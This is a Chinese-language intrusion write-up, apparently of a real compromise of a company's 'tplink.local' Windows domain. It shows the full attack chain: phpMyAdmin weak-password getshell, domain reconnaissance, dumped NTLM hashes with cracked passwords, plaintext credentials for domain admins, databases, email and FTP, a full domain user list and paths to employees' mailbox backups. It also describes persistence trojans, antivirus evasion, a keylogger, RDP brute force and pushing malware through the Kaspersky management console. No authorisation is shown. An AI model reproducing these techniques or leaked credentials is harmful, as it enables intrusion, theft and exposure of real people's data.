渗透测试之内网渗透(TP-Link AD域)
PMA GetShell
PhpMyadmin 弱口令 + 慢查询 GetShell
信息收集
进程
D:\phpStudy\tmp >tasklist /SVC
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 500 N/A
csrss.exe 608 N/A
csrss.exe 660 N/A
wininit.exe 668 N/A
winlogon.exe 712 N/A
services.exe 756 N/A
lsass.exe 764 EFS, KeyIso, Netlogon, SamSs
svchost.exe 832 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 864 RpcEptMapper, RpcSs
LogonUI.exe 956 N/A
dwm.exe 968 N/A
svchost.exe 996 Dhcp, EventLog, lmhosts, vmictimesync,
Wcmsvc
svchost.exe 320 AeLookupSvc, Appinfo, BITS, gpsvc, IKEEXT,
iphlpsvc, LanmanServer, ProfSvc, Schedule,
SENS, SessionEnv, ShellHWDetection, Themes,
Winmgmt
svchost.exe 604 EventSystem, FontCache, netprofm, nsi,
W32Time, WinHttpAutoProxySvc
kavfs.exe 1028 KAVFS //卡巴斯基
kavfswh.exe 1072 kavfsslp
svchost.exe 1132 Dnscache, LanmanWorkstation, NlaSvc, WinRM
svchost.exe 1256 BFE, DPS, MpsSvc
spoolsv.exe 1480 Spooler
aakore.exe 1532 aakore
conhost.exe 1556 N/A
httpd.exe 1648 Apache2a
task-manager.exe 1688 N/A
kavfswp.exe 1712 N/A
svchost.exe 1756 AppHostSvc
atashost.exe 1772 atashost
grpm-sync-unit.exe 1908 N/A
httpd.exe 1916 N/A
kavfswp.exe 2616 N/A
svchost.exe 2828 CryptSvc
dsm_sa_eventmgr64.exe 2864 dcevt64
dsm_sa_datamgr64.exe 2884 dcstor64
svchost.exe 2928 DiagTrack
FileZilla Server.exe 2952 FileZilla Server
FoxitConnectedPDFService. 2688 FoxitReaderService
inetinfo.exe 2940 IISADMIN
kavfsscs.exe 876 kavfsscs
mysqld.exe 3580 MySQLa
NetExpressUpdater.exe 3616 NetExpress Updater
scpbradserv.exe 3720 scpbradserv
SerasaUpdate.exe 3816 SerasaUpdate
TeamViewer_Service.exe 2516 TeamViewer
TPLinkIntegradorEstoque.S 3696 TPLinkIntegradorEstoqueService
svchost.exe 1348 ScDeviceEnum, TrkWks, UALSVC, UmRdpService,
vmickvpexchange, vmicshutdown, vmicvss
svchost.exe 3144 W3SVC, WAS
zabbix_agentd.exe 4000 Zabbix Agent
active_protection_service 3424 AcronisActiveProtectionService
cyber-protect-service.exe 4248 AcronisCyberProtectionService
updater.exe 4360 N/A
WmiPrvSE.exe 4924 N/A
dsm_om_connsvc64.exe 3464 Server Administrator
adp-agent.exe 5632 N/A
svchost.exe 6360 vmicheartbeat, vmicrdv
svchost.exe 6408 TermService
svchost.exe 6440 PolicyAgent
VSSVC.exe 6676 VSS
schedul2.exe 4264 AcrSch2Svc
DDVRulesProcessor.exe 7096 DDVRulesProcessor
Dsapi.exe 4216 Dell Hardware Support
ServiceShell.exe 6600 DellClientManagementService
klnagent.exe 580 klnagent
msdtc.exe 3992 MSDTC
SupportAssistAgent.exe 4180 SupportAssistAgent
mms.exe 7560 MMS
klnagent.exe 7860 N/A
vapm.exe 7384 N/A
unsecapp.exe 7292 N/A
scpbradguard.exe 8712 N/A
svchost.exe 8664 swprv
taskeng.exe 7784 N/A
csrss.exe 9628 N/A
winlogon.exe 7304 N/A
dwm.exe 8624 N/A
taskhostex.exe 9520 N/A
rdpclip.exe 5992 N/A
explorer.exe 8972 N/A
BACSTray.exe 10204 N/A
schedhlp.exe 3692 N/A
MmsMonitor.exe 7104 N/A
MmsMonitor.exe 10272 N/A
RuntimeBroker.exe 10336 N/A
MmsMonitor.exe 10348 N/A
MmsMonitor.exe 10420 N/A
eSfUpdateForm.exe 10636 N/A
kavtray.exe 10724 N/A
tib_mounter_monitor.exe 10776 N/A
csrss.exe 11244 N/A
winlogon.exe 10444 N/A
dwm.exe 4328 N/A
taskhostex.exe 9176 N/A
rdpclip.exe 10772 N/A
rdpinput.exe 6460 N/A
explorer.exe 10188 N/A
BACSTray.exe 11580 N/A
schedhlp.exe 11588 N/A
MmsMonitor.exe 11608 N/A
RuntimeBroker.exe 11780 N/A
MmsMonitor.exe 11800 N/A
MmsMonitor.exe 11812 N/A
MmsMonitor.exe 11828 N/A
eSfUpdateForm.exe 12108 N/A
FileZilla Server Interfac 12136 N/A
kavtray.exe 12168 N/A
tib_mounter_monitor.exe 12252 N/A
mmc.exe 11528 N/A
wpscenter.exe 10044 N/A
armsvc.exe 6332 AdobeARMservice
OfficeClickToRun.exe 10308 ClickToRunSvc
csrss.exe 12636 N/A
winlogon.exe 10696 N/A
dwm.exe 10976 N/A
taskhostex.exe 12756 N/A
rdpclip.exe 9648 N/A
explorer.exe 12008 N/A
BACSTray.exe 7000 N/A
schedhlp.exe 11488 N/A
MmsMonitor.exe 10760 N/A
RuntimeBroker.exe 11892 N/A
MmsMonitor.exe 8516 N/A
MmsMonitor.exe 3520 N/A
MmsMonitor.exe 12640 N/A
eSfUpdateForm.exe 4824 N/A
kavtray.exe 11728 N/A
tib_mounter_monitor.exe 8360 N/A
MgxpaRuntime.exe 1900 N/A
MgxpaRuntime.exe 8784 N/A
lmgrd.exe 7664 FlexLM
conhost.exe 9048 N/A
lmgrd.exe 13132 N/A
LMG.EXE 12436 N/A
nssm.exe 12952 EX_IMP_RETORNO_SILOTEC
uniRTE.exe 8840 N/A
CGConsultaNFeSefaz.exe 12784 N/A
sppsvc.exe 9880 sppsvc
cmd.exe 7828 N/A
conhost.exe 7408 N/A
cmd.exe 4156 N/A
tasklist.exe 9532 N/A
IP信息
c:\Temp >ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : D566S2J2
Primary Dns Suffix . . . . . . . : tplink.local
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : tplink.local
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter
Physical Address. . . . . . . . . : 00-15-5D-1A-05-02
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.30.26.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.30.26.1
DNS Servers . . . . . . . . . . . : 10.30.26.4
10.30.26.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{AE81C558-8474-4AA3-B388-225EB5315B2D}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
系统信息
c:\Temp >systeminfo
Host Name: D566S2J2
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-60129-11929-AA730
Original Install Date: 17/02/2017, 12:52:01
System Boot Time: 16/02/2023, 20:08:47
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 4 GenuineIntel ~1796 Mhz
BIOS Version: American Megatrends Inc. 090007 , 18/05/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: pt-br;Portuguese (Brazil)
Input Locale: pt-br;Portuguese (Brazil)
Time Zone: (UTC-03:00) Brasilia
Total Physical Memory: 16.384 MB
Available Physical Memory: 7.739 MB
Virtual Memory: Max Size: 18.816 MB
Virtual Memory: Available: 9.989 MB
Virtual Memory: In Use: 8.827 MB
Page File Location(s): C:\pagefile.sys
Domain: tplink.local
Logon Server: N/A
Hotfix(s): 144 Hotfix(s) Installed.
[01]: KB5001088
[02]: KB2868626
[03]: KB2894852
[04]: KB2919355
[05]: KB2919442
[06]: KB2934520
[07]: KB2938066
[08]: KB2938772
[09]: KB2949621
[10]: KB2954879
[11]: KB2966826
[12]: KB2966828
[13]: KB2967917
[14]: KB2968296
[15]: KB2972103
[16]: KB2975061
[17]: KB2976920
[18]: KB2982998
[19]: KB2989930
[20]: KB2999226
[21]: KB3000483
[22]: KB3000850
[23]: KB3003057
[24]: KB3004545
[25]: KB3012702
[26]: KB3013172
[27]: KB3013769
[28]: KB3013791
[29]: KB3013816
[30]: KB3014442
[31]: KB3019978
[32]: KB3020393
[33]: KB3023219
[34]: KB3023266
[35]: KB3024751
[36]: KB3024755
[37]: KB3030947
[38]: KB3033446
[39]: KB3036612
[40]: KB3037576
[41]: KB3038002
[42]: KB3042085
[43]: KB3044374
[44]: KB3044673
[45]: KB3045634
[46]: KB3045685
[47]: KB3045717
[48]: KB3045719
[49]: KB3045999
[50]: KB3046017
[51]: KB3046737
[52]: KB3046795
[53]: KB3054203
[54]: KB3054256
[55]: KB3054464
[56]: KB3055323
[57]: KB3059317
[58]: KB3060681
[59]: KB3060793
[60]: KB3061512
[61]: KB3063843
[62]: KB3071756
[63]: KB3072307
[64]: KB3074228
[65]: KB3074545
[66]: KB3077715
[67]: KB3078071
[68]: KB3078405
[69]: KB3080149
[70]: KB3084135
[71]: KB3084905
[72]: KB3086255
[73]: KB3087137
[74]: KB3091297
[75]: KB3094486
[76]: KB3095711
[77]: KB3097992
[78]: KB3100473
[79]: KB3102429
[80]: KB3103616
[81]: KB3103696
[82]: KB3103709
[83]: KB3104002
[84]: KB3109103
[85]: KB3109976
[86]: KB3110329
[87]: KB3121261
[88]: KB3123245
[89]: KB3126434
[90]: KB3126587
[91]: KB3127222
[92]: KB3133043
[93]: KB3133690
[94]: KB3134179
[95]: KB3135998
[96]: KB3137728
[97]: KB3138602
[98]: KB3139914
[99]: KB3139929
[100]: KB3140219
[101]: KB3142036
[102]: KB3145384
[103]: KB3145432
[104]: KB3146604
[105]: KB3146751
[106]: KB3147071
[107]: KB3156059
[108]: KB3159398
[109]: KB3161949
[110]: KB3162835
[111]: KB3164024
[112]: KB3170106
[113]: KB3172614
[114]: KB3173424
[115]: KB3178539
[116]: KB3179574
[117]: KB3185319
[118]: KB4033369
[119]: KB4033428
[120]: KB4040974
[121]: KB4040981
[122]: KB4457009
[123]: KB4457036
[124]: KB4457045
[125]: KB4459943
[126]: KB4470622
[127]: KB4470630
[128]: KB4483187
[129]: KB4486105
[130]: KB5012170
[131]: KB5014637
[132]: KB5016264
[133]: KB5016268
[134]: KB5016370
[135]: KB5016372
[136]: KB5017038
[137]: KB5017398
[138]: KB5018519
[139]: KB5018922
[140]: KB5020862
[141]: KB5020878
[142]: KB5022508
[143]: KB5022525
[144]: KB5022899
Network Card(s): 1 NIC(s) Installed.
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet 2
DHCP Enabled: No
IP address(es)
[01]: 10.30.26.2
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed
用户名
c:\Temp >net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Andre backup
Cigam Cigam2 crespidb
Feynman Peng Guest Marcio
STEFAN FENG suporte1 thiago
tplink vitor
The command completed with one or more errors.
c:\Temp >
域控与域管
定位域控
方法1
c:\Temp >nslookup
Default Server: UnKnown
Address: 10.30.26.4
方法2
c:\Temp >net time /domain
Current time at \\SRVADM.tplink.local is 01/03/2023 02:41:50
The command completed successfully.
c:\Temp >ping SRVADM.tplink.local
Pinging SRVADM.tplink.local [10.30.26.4] with 32 bytes of data:
Reply from 10.30.26.4: bytes=32 time<1ms TTL=128
Reply from 10.30.26.4: bytes=32 time<1ms TTL=128
Reply from 10.30.26.4: bytes=32 time<1ms TTL=128
Reply from 10.30.26.4: bytes=32 time<1ms TTL=128
Ping statistics for 10.30.26.4:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
定位域管账号
c:\Temp >net group "Domain Admins" /domain
The request will be processed at a domain controller for domain tplink.local.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator suporte suporte1
机器
c:\Temp >net group "domain computers" /domain
The request will be processed at a domain controller for domain tplink.local.
Group name Domain Computers
Comment All workstations and servers joined to the domain
Members
-------------------------------------------------------------------------------
A-BOUZON-TPL$ A-COSTA-TPL$ ALE-RODRIG-TPL$
AL-FARIA-TPL$ ALINE-FARIA-TPL$ AL-NOGUEIRA-TPL$
A-MIQUELINI-TPL$ ANA-LIDIA-TPL$ ANA-LUCIA-TPL$
ANA-ZUG5-TPL$ ANA-ZUGAIB-TPL$ ANA-ZUGB-TPL$
AN-COSTA-TPL$ ANDRE-DEPO-TPL$ A-NEVES-TPL$
ANT-BOUZON-TPL$ A-SILVA-TPL$ A-YASUDA-TPL$
A-YASUDA-TPL-OL$ A-YOSHIDA-TPL$ BACKUP2-TPL$
BRAD-WANG-TPL$ B-SOUZA-TPL$ CAM-FRIZZO-TPL$
C-CARDOSO-TPL$ C-FRIZZO-TPL$ CLAYTON-TOR-TPL$
CLTN-TORRES-TPL$ C-SILVA-TPL$ D566S2J2$
DAN-AKEMI-TPL$ DANI-DIMAS-OLD$ DANI-DIMAS-TPL$
D-COSTA-TPL$ DEN-AUGUSTO-TPL$ D-GARCIA-TPL$
D-ROYES-TPL$ ELIAKIN-TPL$ ELIAS-SILVA-TPL$
E-PIRES-TPL$ E-ZANINELLI-OLD$ E-ZANINELLI-TPL$
FABIO-APP3-TPL$ F-ALBIERO-TPL$ FEYNMAN-TPL$
G-CONCEICAO-TPL$ GILMARA-B-TPL$ G-MONTEIRO-TPL$
G-SILVA-TPL$ GUI-BOMFIM-TPL$ GUI-MARQUES-TPL$
GUI-VICTOR-TPL$ HEN-DUARTE-TPL$ I-ANNES-TPL$
ISA-CLEARY-TPL$ ISA-LIMA-TPL$ ISMAEL-MOTA-TPL$
JAC-GOMES-TPL$ JACOB-XIONG-TPL$ JAC-SANTOS-TPL$
JAN-ZANUSSO-TPL$ J-BARROS-TPL$ J-GOMES-TPL$
JOAO-REIS-TPL$ J-OLIVEIRA-TPL$ JONA-SILVA-TPL$
JONATHAN-TPL$ J-SANTOS-TPL$ J-SILVA-TPL$
JU-BARROS-TPL$ JU-CIOFFI-TPL$ J-ZANUSSO-TPL$
J-ZHOU-TPL$ KETILENE-B-TPL$ LAI-SANTOS-TPL$
LA-PASCHOAL-TPL$ LAPTOP-G55NKT3D$ L-BAZELLO-TPL$
LELIO-SATO-TPL$ LEO-COSTA-TPL$ LET-ODETE-TPL$
LHIONG-ZHAO-TPL$ L-RIBEIRO-TPL$ L-SOUSA-TPL$
LUA-MARTINS-TPL$ LUCAS-GIOVA-TPL$ L-ZHAO-TPL-OLD$
MAR-BARBOSA-TPL$ MARCOS-PAV-TPL$ MAT-SANTANA-TPL$
MATT-LI-TPL$ MAURICIO-R-TPL$ M-OLIVEIRA-TPL$
MONICA-MOYA-TPL$ NELSON-ITO-TPL$ N-ITO-TPL$
NOTE-RESERVA$ O-BRUNELLI-TPL$ PATR-SANTOS-TPL$
PRI-AMIOKA-TPL$ RAPH-ALVES-TPL$ RENATO-R-TPL$
R-KONDO-TPL$ R-MELO-TPL$ R-PARE-TPL$
R-ROSSI-TPL$ SOFIA-PAEZ-TPL$ SRVBANCO$
SRVREMOTO$ SUELY-ODA-TPL$ TIF-WANG-TPL$
TPL-HARRY$ T-SALES-TPL$ T-WANG-TPL$
V-GOMES-TPL$ VIC-GUSTAVO-TPL$ VITOR-DELL-TPL$
VIV-SANTOS-TPL$ V-SANTOS-TPL$
Dump Hash
Administrator:500:00000000000000000000000000000000:A68191B2DB69D875A8AD3E22904E4687:::
@Tplink123
Guest:501:00000000000000000000000000000000:00000000000000000000000000000000:::
Cigam:1004:00000000000000000000000000000000:3B068A46B0EF33F416DE9032BD9BD67A:::
tplink:1006:00000000000000000000000000000000:C1828E8A0EA2CDD933691D1DFA63E710:::
Marcio:1009:00000000000000000000000000000000:BCE1F4991693E0E188256F1EFD814F63:::
tpl123
thiago:1010:00000000000000000000000000000000:76CF5A18C401DC5CE320D9D38AF813B9:::
Vaguininho
vitor:1011:00000000000000000000000000000000:6E11CDA0CDD91BD0E784CC8E5B28534C:::
9764
Cigam2:1012:00000000000000000000000000000000:EF38A0EDAEBE06F838BE4EEC68144952:::
suporte1:1016:00000000000000000000000000000000:7D77EFF0872F2AD93845A868BE21E16F:::
backup:1017:00000000000000000000000000000000:282D2361E5888C3392B54D7AFC6E0942:::
crespidb:1018:00000000000000000000000000000000:9C045226A957CED581A169E6A8681B41:::
Feynman Peng:1019:00000000000000000000000000000000:E05045A02452757816681AE941716E14:::
QW!825528
Andre:1023:00000000000000000000000000000000:3A6B69C2C49B209A6843265F43F2CC8F:::
1728
STEFAN FENG:1025:00000000000000000000000000000000:2170C1BC6DBCB33735953F1B42FF3252:::
258369
修改注册表抓密码
# backup
* Username : D566S2J2\backup
* Domain : 10.30.25.254
* Password : @Tplink123
* Username : backup
* Domain : tplink.local
* Password : @Tplink123
* Username : backup
* Domain : (null)
* Password : !Tpl@2017#BK
# Administrator
* Username : D566S2J2\Administrator
* Domain : D566S2J2\Administrator
* Password : @Tplink123
# prodaly01
* Username : prodaly01
* Domain : TPLINK
* Password : !daly1110#
# prodaly02
* Username : prodaly02
* Domain : TPLINK
* Password : @daly2220#
# suporte1
* Username : suporte1
* Domain : D566S2J2
* Password : !Sup@2022#AD
* Username : suporte1
* Domain : tplink.local
* Password : !Sup@2022#AD
搜索配置文件找密码
<?xml version="1.0" encoding="utf-8"?>
<tpLink>
<!--Conexao-->
<ip-banco>SRVBANCO</ip-banco>
<nome-banco>cigam_e10</nome-banco>
<usuario-banco>cigam</usuario-banco>
<senha-banco>TghY!Ya@poL)</senha-banco>
<porta-banco>1433</porta-banco>
<!--Parametros-->
<unidade-negocio-estoque>002</unidade-negocio-estoque>
<serie-estoque>2</serie-estoque>
<unidade-negocio-entrada>002</unidade-negocio-entrada>
<serie-entrada>2</serie-entrada>
<!--Email-->
<email-remetente>Serial Number</email-remetente>
<email-endereco-remetente>[email protected]</email-endereco-remetente>
<email-host>smtp.office365.com</email-host>
<email-porta>587</email-porta>
<email-destinatario>[email protected];[email protected];[email protected];[email protected];[email protected]</email-destinatario>
<email-ssl-ativar>1</email-ssl-ativar>
<email-ssl-usuario>[email protected]</email-ssl-usuario>
<email-ssl-senha>Tplink2017</email-ssl-senha>
<!--Pasta para repositório de arquivos-->
<pasta-china>F:\CIGAM\cigam_e10\Serial Number\HQ-China\</pasta-china>
<pasta-destino>F:\CIGAM\cigam_e10\Serial Number\Integrados\</pasta-destino>
<pasta-amostra>F:\CIGAM\cigam_e10\Silotec FTP\SERIAL_NUMBERS\</pasta-amostra>
<pasta-erro>F:\CIGAM\cigam_e10\Serial Number\Erro\</pasta-erro>
收集各种工具密码
FileZilla
[>] Host : cigam-dv1.cloudapp.net
[>] Port : 21
[>] User : crescerftp
[>] Pass : PXo5kX
[>] Host : cigam.dv1.cloudapp.net
[>] Port : 21
[>] User : crescerftp
[>] Pass : PXo5kX
[>] Host : crescer.no-ip.org
[>] Port : 3380
[>] User : infra
[>] Pass : infra2012
[>] Host : cigam-dv1.cloudapp.net
[>] Port : 21
[>] User : crescerft0
[>] Pass : PXo5kX
所有域用户
abouzon
acosta
adepoli
Administrator
afaria
amiquelini
aneves
anogueira
apieri
apimentel
arodrigues
asantos
asilva
ayasuda
ayoshida
azugaib
backup
backup2
backup3
bguerra
bpereira
bsouza
bwang
ccardoso
cfrizzo
crespidb
crespisql
csilva
ctorres
cyang
dakemi
dcosta
dflorio
dgarcia
droyes
dsantos
dsun
eceola
eolivieri
epires
esilva
ezaninelli
falbiero
fappel
fcoelho
fpeng
fportugal
gbomfim
gbrasil
gconceicao
gmarques
gmonteiro
gserrano
gsilva
Guest
gvictor
hcui
hduarte
iannes
icleary
ilima
imota
iprado
jbarros
jbianco
jcioffi
jgomes
jjia
jmoraes
joliveira
jreis
jsantos
jsilva
jxiong
jzanusso
jzhou
kbezerra
KL-AK-666BB1B867E534
klin
KlPxeUserF9641C68285
KlScSvc1892DAD2AE52F
krbtgt
lbazello
lcosta
lmartins
lodete
lpaschoal
lribeiro
lsantos
lsato
lsousa
lsouza
ltorres
lzhao
mbarbosa
mcosta
mli
mlivieiro
mmartins
mmonteiro
mmoya
moliveira
mpavan
mrizzi
msantana
msilva
nito
nzhong
obrunelli
pamioka
prodaly01
prodaly02
psantos
ralves
rgarcia
rhuete
rkondo
rmelo
rparente
rrossi
rstagine
scanner
sfeng
soda
spaez
suporte
suporte1
syncadcigam
synccigam
tsales
twang
vgomes
vgustavo
vjunior
voliveira
vsantos
vsouza
whuajin
查找PST文件
PST文件是邮箱备份文件
z:\File_Server\DEP Finances\backup lihong\Documents\Arquivos do Outlook\[email protected]
z:\File_Server\DEP Finances\backup lihong\Documents\Arquivos do Outlook\[email protected]
z:\File_Server\DEP HR_ADM\HR\[email protected]
z:\File_Server\DEP HR_ADM\HR\2017\[email protected]
z:\File_Server\DEP HR_ADM\HR\2017\[email protected] (1).pst
z:\File_Server\DEP HR_ADM\HR\2017\[email protected]
z:\File_Server\DEP HR_ADM\HR\backup emails rh\[email protected]
z:\File_Server\DEP Tech_Support\backup emails suporte\backup suporte.pst
z:\File_Server\TP-Link\Dept\backup\backup.pst
z:\File_Server\TP-Link\Dept\Products\Sercomtel\Novo arquivo de dados.pst
z:\File_Server\TP-Link\Shared\backup alan\[email protected]
z:\File_Server\TP-Link\Shared\backup alan\backup alan\[email protected]
z:\File_Server\TP-Link\Shared\Felipe Cruz\[email protected]
z:\File_Server\TP-Link\Shared\TI\Backups\[email protected]
z:\File_Server\TP-Link\Shared\TI\Backups\Outlook.pst
x:\File_Server\DEP Finances\Feynman\archive.pst
x:\File_Server\DEP Finances\Feynman\Feynman Backup - Data-D\Feynman Back Up\FABIO\archive.pst
x:\File_Server\DEP Finances\Feynman\Feynman Backup - Data-D\TP-LINK BR\VAGNER\archive.pst
x:\File_Server\DEP Finances\Feynman\Feynman Backup - Data-D\TP-LINK BR\VAGNER\My Outlook Data File(1).pst
x:\File_Server\DEP HR_ADM\HR\[email protected]
x:\File_Server\DEP HR_ADM\HR\2017\[email protected]
x:\File_Server\DEP HR_ADM\HR\2017\[email protected] (1).pst
x:\File_Server\DEP HR_ADM\HR\2017\[email protected]
x:\File_Server\DEP HR_ADM\HR\backup emails rh\[email protected]
x:\File_Server\DEP Tech_Support\backup emails suporte\backup suporte.pst
x:\File_Server\TP-Link\Dept\backup\backup.pst
x:\File_Server\TP-Link\Dept\Products\Sercomtel\Novo arquivo de dados.pst
x:\File_Server\TP-Link\Shared\backup alan\[email protected]
x:\File_Server\TP-Link\Shared\backup alan\backup alan\[email protected]
x:\File_Server\TP-Link\Shared\Felipe Cruz\[email protected]
x:\File_Server\TP-Link\Shared\TI\Backups\[email protected]
x:\File_Server\TP-Link\Shared\TI\Backups\Outlook.pst
后渗透
权限维持
这次权限维持的话都是把木马放用户自启动目录
横向移动
此次内网移动分为两个,一是上代理进内网,二是抓密码尝试撞密码
内网代理
这里后期对方关闭Web服务,导致通过页面代理流量方式失败,只能上传Exe进行隧道代理(目标有卡巴斯基需要免杀)
内网扫描一圈没啥好的入口,后期内网代理主要是做RDP登录。
定期抓密码
没办法,抓到的密码一直不对,前期仅限于已控的两台机器,只能定期定期Dump内存抓密码,这里还有一个小插曲,我还部署了键盘记录器,有所收获但是不知道对方登录的是什么服务,后期键盘记录器也被卡巴杀了,免杀很重要!!!
终于抓到了域管密码,直接RDP登录域控,导出所有用户凭证
流程总结
PMA GetShell 拿下入口D566S2J2(10.30.26.2)
这是后期上去发现很多工具被卡巴杀了,主要是记录还不能删除,删除需要密码
RDP爆破 拿下SRVDADOS(10.30.26.10)
Dump内存抓到域管密码拿下SRVADM(10.30.26.4)
####卡巴斯基远程推送木马拿下SRVBANCO(10.30.26.3)
这里就是实验卡巴斯基推送Exe功能,域控卡巴斯基管理端有70多台机器
